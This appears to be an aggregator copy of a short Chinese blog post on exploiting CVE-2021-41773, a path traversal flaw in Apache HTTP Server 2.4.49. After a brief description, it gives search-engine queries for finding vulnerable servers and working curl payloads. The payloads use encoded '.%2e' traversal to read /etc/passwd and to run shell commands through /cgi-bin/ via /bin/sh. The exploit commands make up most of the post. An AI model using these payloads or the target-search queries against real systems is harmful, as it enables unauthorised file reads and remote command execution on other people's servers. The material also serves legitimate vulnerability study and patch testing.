5

Apache HTTP Server漏洞利用

 2 years ago
source link: https://h3art3ars.github.io/2021/11/24/Apache-HTTP-Server%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Apache HTTP Server漏洞利用

2021-11-242022-05-24 漏洞

Apache HTTP Server漏洞利用

Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。

漏洞原理分析

Apache httpd Server CVE-2021-41773 漏洞分析

app = "apache-server/2.4.49"

shodan

server: Apache/2.4.49

本地文件读取

curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
2
3
curl -s --path-as-is "http://localhost:8787/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK